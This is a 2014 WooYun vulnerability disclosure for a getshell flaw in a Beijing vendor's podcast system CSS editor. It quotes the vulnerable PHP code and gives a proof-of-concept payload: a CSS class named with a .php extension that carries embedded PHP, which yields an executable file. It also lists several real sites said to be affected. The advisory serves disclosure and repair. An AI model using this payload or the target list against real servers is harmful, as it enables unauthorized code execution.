北京尚为视讯播客系统存在Getshell漏洞

漏洞详情

披露状态:

2014-01-06: 细节已通知厂商并且等待厂商处理中
2014-01-11: 厂商已经确认,细节仅向厂商公开
2014-01-14: 细节向第三方安全合作伙伴开放
2014-01-21: 细节向核心白帽子及相关领域专家公开
2014-01-31: 细节向普通白帽子公开
2014-02-20: 细节向实习白帽子公开
2014-04-06: 细节向公众公开

简要描述:

听说提交通用型漏洞有奖励,提交一个去年发现的漏洞吧

详细说明:

北京尙为视讯科技有限公司播客系统看界面像是joomla的二次开发,在去年接到对某系统的授权测试时发现了此getshell漏洞,漏洞文件为http://www.shinyv.com/css_edit/css.php

css编辑器,

QQ图片20131219161003.jpg



这个css编辑器未对传入的数据做到很好的过滤,形成了getshell

css.php文件第1370-1375行

<form action="<?php echo $_SERVER['PHP_SELF']?>" method="POST"  name="formAdmin">
<TEXTAREA id=output style="BORDER-RIGHT: gray 1px solid; BORDER-TOP: gray 1px solid; MARGIN: px; BORDER-LEFT: gray 1px solid; WIDTH: 220px; BORDER-BOTTOM: gray 1px solid" name=textarea rows=7>
</TEXTAREA>
<br>
<input type="submit" value="保存代码" name="submit" >
</form>





上传,然后第1398-1460行

<?php

$textarea = $_POST['textarea'];
$css_name = 'template_css.css';
$fp = fopen($css_name,'a+');
$css_back = file_get_contents($css_name);
$start = strpos($textarea,".");
$end = strpos($textarea,"{");
$start = $start+1;
$end = $end - 1;;
$css_name = substr($textarea,$start,$end);
// echo $css_name;
$nums = strpos($css_back,$css_name);
echo $nums;
if ($nums == ""){


file_put_contents($css_name,$textarea);
}

$content = file_get_contents($css_name,$textarea);
echo $content;
/* $num = strlen($css_name);
// echo $num;

$num_start = strpos($css_back,$css_name);
// echo $num_start;
$num_end = strpos($css_back,"}",$num_start);
// echo $num_end;
$num_start = $num_start -1 ;
$num_end = $num_end +1;
$str_back = substr($css_back,$num_start,$num_end);
// echo $str_back;

$new_css = substr_replace($css_back,$textarea,$num_start,$num_end);
// echo $new_css;
// fwrite($fp,$new_css);
// $fp = fopen($css_name,'w+');
$content = file_get_contents($css_name);
echo $content;
// file_put_contents($css_name,$new_css);
//$content = file_get_contents($css_name);
//echo $content;
/*
echo $text_area;
echo $num;
echo $re_str;
/*
$str1 = "qqqqq";
$srt = "qqq{} aaaa{rewqrewqrewq} aaa{}";
$str = "aaaa";
$qqq = substr($srt,7,19);
echo $qqq;
str_replace($qqq,$str)
//echo strpos($srt,"}",5);
//echo strlen($str);
//echo strpos($srt,$str);

$str = "abcdef";
$strt = substr_replace($str,"aa",0,1);
echo $strt;
*/
?>



这样,提交

.someclass.php{
color : #C7FF38;
background-color : #E89100;
border-width : 1px; <?php phpinfo()?>
border-top-width : 1px;
border-left-width : 11px;
border-bottom-width : 1px;
border-color : transparent;
}





保存代码 访问http://www.shinyv.com/css_edit/someclass.php



2.jpg

漏洞证明:

这个系统用的人还挺多的

http://tv.tianjinwe.com/css_edit/css.php

http://www.woshitv.com/css_edit/css.php

http://audio.cnr.cn/css_edit/css.php 等等等等。。。。。

修复方案:

将没用的文件删除

版权声明:转载请注明来源 TestRoot@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2014-01-11 10:08

厂商回复:

最新状态:

暂无


漏洞评价: